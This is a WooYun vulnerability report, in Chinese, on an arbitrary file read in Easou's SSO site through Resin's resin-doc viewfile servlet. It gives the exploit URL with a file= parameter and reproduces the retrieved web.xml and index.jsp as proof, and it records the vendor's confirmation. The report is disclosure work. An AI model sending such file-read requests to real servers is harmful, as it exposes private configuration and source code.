当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092390

漏洞标题:宜搜某重要站点任意文件读取导致敏感信息泄漏

相关厂商:easou.com

漏洞作者: 路人甲

提交时间:2015-01-19 14:30

修复时间:2015-03-05 14:32

公开时间:2015-03-05 14:32

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-19: 细节已通知厂商并且等待厂商处理中
2015-01-19: 厂商已经确认,细节仅向厂商公开
2015-01-29: 细节向核心白帽子及相关领域专家公开
2015-02-08: 细节向普通白帽子公开
2015-02-18: 细节向实习白帽子公开
2015-03-05: 细节向公众公开

简要描述:

mei you wubi le

详细说明:

http://sso.easou.com/
http://sso.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/web.xml

WEB-INF/web.xml
<web-app xmlns="http://caucho.com/ns/resin"
         xmlns:resin="http://caucho.com/ns/resin/core">
  <class-loader>
    <simple-loader path="WEB-INF/xsl"/>
    <compiling-loader path="WEB-INF/classes" source="WEB-INF/src"/>
  </class-loader>
  <database jndi-name="jdbc/resin">
    <driver type="com.caucho.db.jdbc.ConnectionPoolDataSourceImpl">
      <path>WEB-INF/db</path>
      <remove-on-error/>
    </driver>
  </database>
  <servlet servlet-name="viewfile" 
           servlet-class="com.caucho.doc.ViewFileServlet"/>
  <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
  <web-app-deploy url-prefix="/jsp/tutorial"
                  path="jsp/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/php/tutorial"
                  path="php/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/servlet/tutorial"
                  path="servlet/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/webapp/tutorial"
                  path="webapp/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/portlet/tutorial"
                  path="portlet/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/ejb/tutorial"
                  path="ejb/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/ejb3/tutorial"
                  path="ejb3/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/ioc/tutorial"
                  path="ioc/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/jms/tutorial"
                  path="jms/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/cmp/tutorial"
                  path="cmp/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/security/tutorial"
                  path="security/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/resource/tutorial"
                  path="resource/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/db/tutorial"
                  path="db/tutorial"
                  startup-mode="lazy">
<!--
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
-->
  </web-app-deploy>
  <web-app-deploy url-prefix="/jmx/tutorial"
                  path="jmx/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/amber/tutorial"
                  path="amber/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/protocols/tutorial"
                  path="protocols/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <servlet servlet-name="javadoc" 
           servlet-class="com.caucho.doc.JavadocRedirectServlet"/>
  <servlet-mapping url-pattern="/javadoc/*" servlet-name="javadoc"/>
<!--
  <resource jndi-name="caucho/doc/ConfigTree" type="com.caucho.doc.config.ConfigTree">
    <init>
      <name>Configuration</name>
      <element name="Configuration Files">
        <schema name="resin.conf">
          <root>true</root>
          <path>com/caucho/server/resin/resin.rnc</path>
        </schema>
        <schema name="web.xml">
          <root>true</root>
          <path>com/caucho/server/webapp/resin-web-xml.rnc</path>
        </schema>
        <doc name="resin.conf">
          <short-description>the main Resin configuration file</short-description>
          <description>This is the main Resin configuration file</description>
        </doc>
      </element>
    </init>
  </resource>
  <servlet servlet-name="config-explorer" 
           servlet-class="com.caucho.portal.generic.GenericPortalServlet">
    <init>
      <portal resin:type="com.caucho.portal.generic.GenericPortal">
        <buffer-factory resin:type="com.caucho.portal.generic.BufferFactoryImpl">
          <buffer-size>256</buffer-size>
        </buffer-factory>
      </portal>
      <layout>
        <renderer resin:type="com.caucho.portal.alpharenderer.HtmlRenderer">
          <page-title>Resin Configuration Explorer</page-title>
          <stylesheet>portal.css</stylesheet>
        </renderer>
        <window namespace="explorer">
          <renderer resin:type="com.caucho.portal.alpharenderer.HtmlRenderer"/>
          <portlet resin:type="com.caucho.doc.config.TreePortlet">
            <config-tree>${jndi:lookup('caucho/doc/ConfigTree')}</config-tree>
          </portlet>
        </window>
        <window namespace="description">
          <renderer resin:type="com.caucho.portal.alpharenderer.HtmlRenderer">
            <always-write>false</always-write>
          </renderer>
          <portlet resin:type="com.caucho.doc.config.DescriptionPortlet">
          </portlet>
        </window>
      </layout>
    </init>
  </servlet>
  
  <servlet-mapping url-pattern="/config/explorer" servlet-name="config-explorer"/>
-->
</web-app>


http://sso.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp

index.jsp
<%@ page session="false" import="com.caucho.vfs.*, com.caucho.server.webapp.*" %>
<%-- 
  This is the default start page for the Resin server.
  You can replace it as you wish, the documentation will
  still be available as /resin-doc if it is installed.
  --%>
<%
/**
 * See if the resin-doc webapp is installed
 */
boolean hasResinDoc = false;
boolean hasOrientation = false;
ServletContext docApp = application.getContext("/resin-doc");  
if (docApp != null) {
  String rp = docApp.getRealPath("index.xtp");
  if (rp != null && (new java.io.File(rp)).exists())
    hasResinDoc = true;
  if (hasResinDoc) {
    rp = docApp.getRealPath("orientation.xtp");
    if (rp != null && (new java.io.File(rp)).exists())
      hasOrientation = true;
  }
}
%>
<html>
<head><title>Resin® Default Home Page</title></head>
<body>
<h1 style="background: #ccddff">Resin® Default Home Page</h1>
This is the default page for the Resin web server.
<% if (hasResinDoc) { %>
<% if (hasOrientation) { %>
<p>
New users can start <a href="/resin-doc/orientation.xtp?xtpflag=default-homepage">here.</a>.
<% } %>
<p>
Documentation is available <a href="/resin-doc">here.</a>.
<% } else { %>
<p>
The Resin documentation is normally found with the url  <i>
<%= request.getScheme() %>://<%= request.getServerName() %>:<%= request.getServerPort() %>/resin-doc</i>, but it does not appear to be installed at that location.
<% }  %>
</body>
</html>

漏洞证明:

WEB-INF/web.xml
<web-app xmlns="http://caucho.com/ns/resin"
         xmlns:resin="http://caucho.com/ns/resin/core">
  <class-loader>
    <simple-loader path="WEB-INF/xsl"/>
    <compiling-loader path="WEB-INF/classes" source="WEB-INF/src"/>
  </class-loader>
  <database jndi-name="jdbc/resin">
    <driver type="com.caucho.db.jdbc.ConnectionPoolDataSourceImpl">
      <path>WEB-INF/db</path>
      <remove-on-error/>
    </driver>
  </database>
  <servlet servlet-name="viewfile" 
           servlet-class="com.caucho.doc.ViewFileServlet"/>
  <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
  <web-app-deploy url-prefix="/jsp/tutorial"
                  path="jsp/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/php/tutorial"
                  path="php/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/servlet/tutorial"
                  path="servlet/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/webapp/tutorial"
                  path="webapp/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/portlet/tutorial"
                  path="portlet/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/ejb/tutorial"
                  path="ejb/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/ejb3/tutorial"
                  path="ejb3/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/ioc/tutorial"
                  path="ioc/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/jms/tutorial"
                  path="jms/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/cmp/tutorial"
                  path="cmp/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/security/tutorial"
                  path="security/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/resource/tutorial"
                  path="resource/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/db/tutorial"
                  path="db/tutorial"
                  startup-mode="lazy">
<!--
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
-->
  </web-app-deploy>
  <web-app-deploy url-prefix="/jmx/tutorial"
                  path="jmx/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/amber/tutorial"
                  path="amber/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <web-app-deploy url-prefix="/protocols/tutorial"
                  path="protocols/tutorial"
                  startup-mode="lazy">
    <web-app-default>
      <servlet servlet-name="viewfile" 
               servlet-class="com.caucho.doc.ViewFileServlet"/>
      <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/>
      <inherit-session>true</inherit-session>
    </web-app-default>
  </web-app-deploy>
  <servlet servlet-name="javadoc" 
           servlet-class="com.caucho.doc.JavadocRedirectServlet"/>
  <servlet-mapping url-pattern="/javadoc/*" servlet-name="javadoc"/>
<!--
  <resource jndi-name="caucho/doc/ConfigTree" type="com.caucho.doc.config.ConfigTree">
    <init>
      <name>Configuration</name>
      <element name="Configuration Files">
        <schema name="resin.conf">
          <root>true</root>
          <path>com/caucho/server/resin/resin.rnc</path>
        </schema>
        <schema name="web.xml">
          <root>true</root>
          <path>com/caucho/server/webapp/resin-web-xml.rnc</path>
        </schema>
        <doc name="resin.conf">
          <short-description>the main Resin configuration file</short-description>
          <description>This is the main Resin configuration file</description>
        </doc>
      </element>
    </init>
  </resource>
  <servlet servlet-name="config-explorer" 
           servlet-class="com.caucho.portal.generic.GenericPortalServlet">
    <init>
      <portal resin:type="com.caucho.portal.generic.GenericPortal">
        <buffer-factory resin:type="com.caucho.portal.generic.BufferFactoryImpl">
          <buffer-size>256</buffer-size>
        </buffer-factory>
      </portal>
      <layout>
        <renderer resin:type="com.caucho.portal.alpharenderer.HtmlRenderer">
          <page-title>Resin Configuration Explorer</page-title>
          <stylesheet>portal.css</stylesheet>
        </renderer>
        <window namespace="explorer">
          <renderer resin:type="com.caucho.portal.alpharenderer.HtmlRenderer"/>
          <portlet resin:type="com.caucho.doc.config.TreePortlet">
            <config-tree>${jndi:lookup('caucho/doc/ConfigTree')}</config-tree>
          </portlet>
        </window>
        <window namespace="description">
          <renderer resin:type="com.caucho.portal.alpharenderer.HtmlRenderer">
            <always-write>false</always-write>
          </renderer>
          <portlet resin:type="com.caucho.doc.config.DescriptionPortlet">
          </portlet>
        </window>
      </layout>
    </init>
  </servlet>
  
  <servlet-mapping url-pattern="/config/explorer" servlet-name="config-explorer"/>
-->
</web-app>

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-19 14:34

厂商回复:

谢谢指出,我们会及时改正

最新状态:

暂无